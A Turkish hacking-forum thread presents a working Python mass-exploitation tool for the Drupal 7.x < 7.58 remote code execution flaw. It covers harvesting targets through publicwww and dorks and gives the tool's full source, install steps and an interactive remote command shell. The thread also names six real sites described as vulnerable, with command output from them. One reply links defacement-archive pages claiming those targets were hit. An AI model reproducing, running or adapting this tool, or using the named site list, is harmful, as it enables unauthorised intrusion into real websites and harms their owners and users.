Drupal 7.x < 7.58 Remote Code Execution Exploit

[Neoax]

Selam millet! Bu konumda, yeni yaptığım bir sömürü aracını sizlerle paylaşmak istiyorum. Eski bir güvenlik açığı olduğunun farkındayım. publicwww.com sitesini keşfettiğimde bu aracı yapmak aklıma geldi. Çoklu hedefler ve tek hedef üzerinde sömürü işlemlerinizi yürütebilirsiniz. Bu araç, Drupal isimli içerik yönetim sisteminin 7.x ve 7.58 sürümleri arasında bulunan uzaktan komut çalıştırma zafiyetini sömürüyor.

Site listesi için Google'da bir takım dorklar aratabilirsiniz veya biraz önce bahsettiğim publicwww.com sitesinden çekebilirsiniz. Öncelikle arama yerine "drupal 7" yazıp, arattıktan sonra aşağıdaki resimde gördüğünüz kutucuğa tıklayarak site listesini indirebilirsiniz. En fazla 1000 site indirilmesine izin veriyor. Fazlası için para ödemeniz gerek. Bu arada ben bu listeyi tarattım ve sadece 1 zafiyetli site buldu. Denemek isterseniz siz bilirsiniz.

programı çalıştırdıktan sonra ekrana yazdırılan parametreleri kullanarak işlemlerinizi yapabilirsiniz. -l parametresi listenin konumunu girebilmenizi sağlıyor. -f parametresini gerekmediği sürece kullanmanıza gerek yok. Varsayılan olarak komut çalıştırabilmek için "passthru" fonksiyonunu kullanıyor. Eğer zafiyetli site bulursanız ve fonksiyon adının passthru değil de system olduğunu belirtirse -f system şeklinde bu fonksiyonu belirtmeniz gerekiyor. Program fazla yavaş olmasın diye sadece system ve passthru fonksiyonlarını kullanıyor. Dilerseniz shell_exec, exec vs. fonksiyonlarını da ekleyebilirsiniz.

Gördüğünüz üzere zafiyetli bir site buldu ve zafiyeti system fonksiyonu ile sömürülebildiğini belirtti. Bununla beraber id komutundan dönen sonucu ekrana yazdırdı. Dönen sonuçta apache gibi HTTP sunucusu adı görürseniz, sistemden pek ümitlenmeyin derim. Genelde sadece komut çalıştırabiliyoruz. Herhangi bir dosya yükleyemiyor ve çekemiyoruz. Zafiyetli sitelerde aşağıda gördüğünüz şekilde komut satırı açabilirsiniz. Sakın ana dosyaları silmeye çalışmayın, web shell yüklemiyor. Sadece komut çalıştırıyor.

Aynı zamanda bir sitede açık bulduysanız, sunucusundaki sitelerde de aynı açığın olma ihtimali var. Zafiyetli sitenin sahibi aynı zamanda sunucunun sahibi de olabilir. Aynı sistemi sunucusundaki diğer sitelerde de kullanabilir. Aşağıda bir örneğini görüyorsunuz. Kullanıcı adlarına bakın. Hepsi aynı.

Bu program hakkında söyleyebilecek başka bir şeyim kalmadı. Kodları ve zafiyetli siteleri aşağıya bıraktım. Erişebilmeniz için 5 krediye ihtiyacınız var.​

 

[Watnea]

Eline sağlık. Çok iyi gidiyorsun. Yararlı konular açıyorsun takipteyim

 

[tkh]

Eline sağlık

 

[sessizejder]

Elinize sağlık

 

[Neoax]

Eline sağlık. Çok iyi gidiyorsun. Yararlı konular açıyorsun takipteyim

Eline sağlık

Elinize sağlık

Teşekkür ederim. Kredi yeri görünüyor mu? Ben göremiyorum da merak ettim.

 

[sessizejder]

Teşekkür ederim. Kredi yeri görünüyor mu? Ben göremiyorum da merak ettim.

Görünüyor

 

[mete.hun]

Teşekkür ederim. Kredi yeri görünüyor mu? Ben göremiyorum da merak ettim.

Evet görünüyor eline sağlık buarada

 

[kadis01]

Selam millet! Bu konumda, yeni yaptığım bir sömürü aracını sizlerle paylaşmak istiyorum. Eski bir güvenlik açığı olduğunun farkındayım. publicwww.com sitesini keşfettiğimde bu aracı yapmak aklıma geldi. Çoklu hedefler ve tek hedef üzerinde sömürü işlemlerinizi yürütebilirsiniz. Bu araç, Drupal isimli içerik yönetim sisteminin 7.x ve 7.58 sürümleri arasında bulunan uzaktan komut çalıştırma zafiyetini sömürüyor.

Site listesi için Google'da bir takım dorklar aratabilirsiniz veya biraz önce bahsettiğim publicwww.com sitesinden çekebilirsiniz. Öncelikle arama yerine "drupal 7" yazıp, arattıktan sonra aşağıdaki resimde gördüğünüz kutucuğa tıklayarak site listesini indirebilirsiniz. En fazla 1000 site indirilmesine izin veriyor. Fazlası için para ödemeniz gerek. Bu arada ben bu listeyi tarattım ve sadece 1 zafiyetli site buldu. Denemek isterseniz siz bilirsiniz.

programı çalıştırdıktan sonra ekrana yazdırılan parametreleri kullanarak işlemlerinizi yapabilirsiniz. -l parametresi listenin konumunu girebilmenizi sağlıyor. -f parametresini gerekmediği sürece kullanmanıza gerek yok. Varsayılan olarak komut çalıştırabilmek için "passthru" fonksiyonunu kullanıyor. Eğer zafiyetli site bulursanız ve fonksiyon adının passthru değil de system olduğunu belirtirse -f system şeklinde bu fonksiyonu belirtmeniz gerekiyor. Program fazla yavaş olmasın diye sadece system ve passthru fonksiyonlarını kullanıyor. Dilerseniz shell_exec, exec vs. fonksiyonlarını da ekleyebilirsiniz.

Gördüğünüz üzere zafiyetli bir site buldu ve zafiyeti system fonksiyonu ile sömürülebildiğini belirtti. Bununla beraber id komutundan dönen sonucu ekrana yazdırdı. Dönen sonuçta apache gibi HTTP sunucusu adı görürseniz, sistemden pek ümitlenmeyin derim. Genelde sadece komut çalıştırabiliyoruz. Herhangi bir dosya yükleyemiyor ve çekemiyoruz. Zafiyetli sitelerde aşağıda gördüğünüz şekilde komut satırı açabilirsiniz. Sakın ana dosyaları silmeye çalışmayın, web shell yüklemiyor. Sadece komut çalıştırıyor.

Aynı zamanda bir sitede açık bulduysanız, sunucusundaki sitelerde de aynı açığın olma ihtimali var. Zafiyetli sitenin sahibi aynı zamanda sunucunun sahibi de olabilir. Aynı sistemi sunucusundaki diğer sitelerde de kullanabilir. Aşağıda bir örneğini görüyorsunuz. Kullanıcı adlarına bakın. Hepsi aynı.

Bu program hakkında söyleyebilecek başka bir şeyim kalmadı. Kodları ve zafiyetli siteleri aşağıya bıraktım. Erişebilmeniz için 5 krediye ihtiyacınız var.​

-=Gizli İçerik=-

Eline Sağlık, Güzel Olumuş

 

[Kryzlo]

Selam millet! Bu konumda, yeni yaptığım bir sömürü aracını sizlerle paylaşmak istiyorum. Eski bir güvenlik açığı olduğunun farkındayım. publicwww.com sitesini keşfettiğimde bu aracı yapmak aklıma geldi. Çoklu hedefler ve tek hedef üzerinde sömürü işlemlerinizi yürütebilirsiniz. Bu araç, Drupal isimli içerik yönetim sisteminin 7.x ve 7.58 sürümleri arasında bulunan uzaktan komut çalıştırma zafiyetini sömürüyor.

Site listesi için Google'da bir takım dorklar aratabilirsiniz veya biraz önce bahsettiğim publicwww.com sitesinden çekebilirsiniz. Öncelikle arama yerine "drupal 7" yazıp, arattıktan sonra aşağıdaki resimde gördüğünüz kutucuğa tıklayarak site listesini indirebilirsiniz. En fazla 1000 site indirilmesine izin veriyor. Fazlası için para ödemeniz gerek. Bu arada ben bu listeyi tarattım ve sadece 1 zafiyetli site buldu. Denemek isterseniz siz bilirsiniz.

programı çalıştırdıktan sonra ekrana yazdırılan parametreleri kullanarak işlemlerinizi yapabilirsiniz. -l parametresi listenin konumunu girebilmenizi sağlıyor. -f parametresini gerekmediği sürece kullanmanıza gerek yok. Varsayılan olarak komut çalıştırabilmek için "passthru" fonksiyonunu kullanıyor. Eğer zafiyetli site bulursanız ve fonksiyon adının passthru değil de system olduğunu belirtirse -f system şeklinde bu fonksiyonu belirtmeniz gerekiyor. Program fazla yavaş olmasın diye sadece system ve passthru fonksiyonlarını kullanıyor. Dilerseniz shell_exec, exec vs. fonksiyonlarını da ekleyebilirsiniz.

Gördüğünüz üzere zafiyetli bir site buldu ve zafiyeti system fonksiyonu ile sömürülebildiğini belirtti. Bununla beraber id komutundan dönen sonucu ekrana yazdırdı. Dönen sonuçta apache gibi HTTP sunucusu adı görürseniz, sistemden pek ümitlenmeyin derim. Genelde sadece komut çalıştırabiliyoruz. Herhangi bir dosya yükleyemiyor ve çekemiyoruz. Zafiyetli sitelerde aşağıda gördüğünüz şekilde komut satırı açabilirsiniz. Sakın ana dosyaları silmeye çalışmayın, web shell yüklemiyor. Sadece komut çalıştırıyor.

Aynı zamanda bir sitede açık bulduysanız, sunucusundaki sitelerde de aynı açığın olma ihtimali var. Zafiyetli sitenin sahibi aynı zamanda sunucunun sahibi de olabilir. Aynı sistemi sunucusundaki diğer sitelerde de kullanabilir. Aşağıda bir örneğini görüyorsunuz. Kullanıcı adlarına bakın. Hepsi aynı.

Bu program hakkında söyleyebilecek başka bir şeyim kalmadı. Kodları ve zafiyetli siteleri aşağıya bıraktım. Erişebilmeniz için 5 krediye ihtiyacınız var.​

-=Gizli İçerik=-

oo iyiymiş ellerinize sağlık

 

[ekmekyiyen44]

kanka beleş yapamazmısın ben alamıyorum ya

ayrıca bu kredinereden kazanılıyor discordun veya telegramın varmı

 

[Kryzlo]

ayrıca bu kredinereden kazanılıyor discordun veya telegramın varmı

Konu 'Yeni Kredi Sistemi Detayları - Forum Güncellemesi'

13 Eki 2025

Merhabalar değerli forum üyeleri.
Forumumuzun aktifliğini arttıracağını düşündüğümüz yeni bir güncelleme yayınladık. Güncelleme detayları aşağıda yer almaktadır.

1 günlük bakım sonucu forumumuza yeni Kredi Sistemi eklenmiştir.

1. Kredi Sistemi nedir?
Kredi sistemi her kullanıcının hesabında biriken forum içi para birimidir. Bu krediler ile hassas bilgilere sahip, değerli konu içeriklerini açmak için harcama yapabileceksiniz. Bunun yanı sıra sizlerde kendiniz kredi kazanabileceğiniz konular açabileceksiniz.
Kredi sistemi harcamalarınızı şimdilik 3. maddedeki...

• GECEGEZEN
• Cevaplar: 36
• Forum: Forum Hakkında

• 
• 

 

[Neoax]

kanka beleş yapamazmısın ben alamıyorum ya

Olur. Aşağıdaki kodları .py uzantılı bir dosyaya kayıt edin. Programı kullanabilmek için python'u kurmalısınız. Ben son sürümü kullanıyorum.

import asyncio
import aiohttp
import aiofiles
import argparse
import warnings
from bs4 import BeautifulSoup, XMLParsedAsHTMLWarning
from colorama import init, Fore
from click import clear

warnings.filterwarnings("ignore", category=XMLParsedAsHTMLWarning)

Headers = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.0.0 Safari/537.36"
}

PostParams = {
    'form_id': 'user_pass',
    '_triggering_element_name': 'name',
    '_triggering_element_value': '',
    'opz': 'E-mail new Password'
}

async def Checker(session, url):
    if not url.startswith(("http://", "https://")):
        url = f"http://{url}"

    if not url.endswith("/"):
        url += "/"

    for function in ["passthru", "system"]:
        output = await Exploit(url, "id", function, session, "uid=")

        if output:
            print(f"{Fore.LIGHTGREEN_EX}[+][{function}]{Fore.LIGHTWHITE_EX} {url} -> {output}")
            async with aiofiles.open("vulns.txt", mode="a", encoding="utf-8") as f:
                await f.write(f"[+][{function}] {url} -> {output}\n")
            return
       
    print(f"{Fore.LIGHTRED_EX}[-] {Fore.LIGHTWHITE_EX}{url}")

async def Exploit(url, command, function, session, message=""):
    GetParams = {
        'q': 'user/password',
        'name[#post_render][]': function,
        'name[#type]': 'markup',
        'name[#markup]': command
    }

    try:
        async with session.post(url, params=GetParams, data=PostParams) as source:
            text = await source.text()

        soup = BeautifulSoup(text, "html.parser")
        form = soup.find('form', {'id': 'user-pass'})
        form_build_id = form.find('input', {'name': 'form_build_id'}).get('value')

        if form_build_id:
            Gparams = {
                'q': 'file/ajax/name/#value/' + form_build_id
            }

            Pparams = {
                'form_build_id': form_build_id
            }

            async with session.post(url, params=Gparams, data=Pparams) as source:
                text = await source.text()

                if message and message not in text:
                    return ""

            return text.split('[{"command":"settings"')[0].strip()
        else:
            return
    except:
        return

async def GetArgs():
    parser = argparse.ArgumentParser()
    parser.add_argument("-u", "--url", help="Hedef siteyi belirtmenizi sağlar.", metavar="")
    parser.add_argument("-l", "--list", help="Sitelerin bulunduğu dosyayı belirtmenizi sağlar.", metavar="")
    parser.add_argument("-f", "--function", help="PHP fonksiyonu belirmenizi sağlar (Varsayılan: passthru).", default="passthru", metavar="")

    return parser, parser.parse_args()

async def PrintLogo():
    print(fr"""{Fore.LIGHTGREEN_EX}
 ____                  _    _____ _____ _____
|    \ ___ _ _ ___ ___| |  | __  |     |   __|
|  |  |  _| | | . | .'| |  |    -|   --|   __|
|____/|_| |___|  _|__,|_|  |__|__|_____|_____|
              |_|  TurkHackTeam.Org/Neoax

>{Fore.LIGHTWHITE_EX} Drupal 7.x < 7.58 Remote Code Execution Exploit                        
    """)

async def Main():
    await PrintLogo()
    parser, args = await GetArgs()
   
    if args.url:
        async with aiohttp.ClientSession() as session:
            if not await Exploit(args.url, "id", args.function, session, "uid="):
                print(f"{Fore.LIGHTRED_EX}[-] {Fore.LIGHTWHITE_EX}Bu adreste güvenlik açığı bulunamadı.")
            else:
                while True:
                    command = input(f"{Fore.LIGHTGREEN_EX}(Komut) {Fore.LIGHTWHITE_EX}> ")

                    match command.lower():
                        case "exit"  : break
                        case "clear" : clear();continue

                    print(Fore.LIGHTWHITE_EX + await Exploit(args.url, command.strip(), args.function, session))

    elif args.list:
        async with aiofiles.open(args.list, mode='r', encoding='utf-8') as f:
            urls = list(set((await f.read()).splitlines()))

        async with aiohttp.ClientSession() as session:
            tasks = [Checker(session, url.strip()) for url in urls]
            await asyncio.gather(*tasks)
   
    else:
        parser.print_help()

if __name__ == "__main__":
    try:
        init()
        asyncio.run(Main())
    except KeyboardInterrupt:
        exit()

Terminalde aşağıdaki kodları çalıştırın:

pip install aiohttp
pip install aiofiles
pip install bs4
pip install colorama
pip install click

Zafiyetli bir kaç site:

[+][passthru] http://ruyi-ltc.com/ -> uid=1003(kuwo67yo) gid=1002(kuwo67yo) groups=1002(kuwo67yo)
[+][passthru] http://ml-foldstage.com/ -> uid=1003(kuwo67yo) gid=1002(kuwo67yo) groups=1002(kuwo67yo)
[+][passthru] http://wbff2025.com/ -> uid=1003(kuwo67yo) gid=1002(kuwo67yo) groups=1002(kuwo67yo)
[+][passthru] http://guangda.com.tw/ -> uid=1003(kuwo67yo) gid=1002(kuwo67yo) groups=1002(kuwo67yo)
[+][system] http://www.filmeb.com.br/ -> uid=48(apache) gid=48(apache) groups=48(apache)
[+][passthru] http://hj0800036999.com/ -> uid=1003(kuwo67yo) gid=1002(kuwo67yo) groups=1002(kuwo67yo)

 

[xNewt]

elinize sağlık hocam

 

[DarkNode]

eline sağlık

 

[P4$A]

Eline sağlık ama pozitif bir eleştiri yapayım
CVE numarası 2018 olan drupalin de baya eski versiyonu olan 7 versiyonuna ait bu exploiti kredili bir konu olmasına gerek olduğunu düşünmüyorum. 2025 de çıkan zafiyeterin poc yaparak atarsan hem daha çok kişinin ilgisini çeker hem de daha çok kredi kazanırsın

 

[Neoax]

Eline sağlık ama pozitif bir eleştiri yapayım
CVE numarası 2018 olan drupalin de baya eski versiyonu olan 7 versiyonuna ait bu exploiti kredili bir konu olmasına gerek olduğunu düşünmüyorum. 2025 de çıkan zafiyeterin poc yaparak atarsan hem daha çok kişinin ilgisini çeker hem de daha çok kredi kazanırsın

Kredi olayını denemek istemiştim. Çaba sarf ediyorum. Daha önce exploit'i paylaşılmamış zafiyetleri anlamakta ve sömürmekte biraz güçlük çekiyorum. Umarım bir şeyler çıkarabilirim. Teşekkür ederim.

 

[OBT is HeRYerDe]

İndirdim Tüm Hedefleri, Eline Sağlık. Böyle Devam Et.

https://ownzyou.com/zone/275521
https://ownzyou.com/zone/275522
https://ownzyou.com/zone/275523
https://ownzyou.com/zone/275524
https://ownzyou.com/zone/275525

 

[Baybars0720]

Eline sağlık kardeşim
Senin konu'nun olduğunu görünce daldım içeri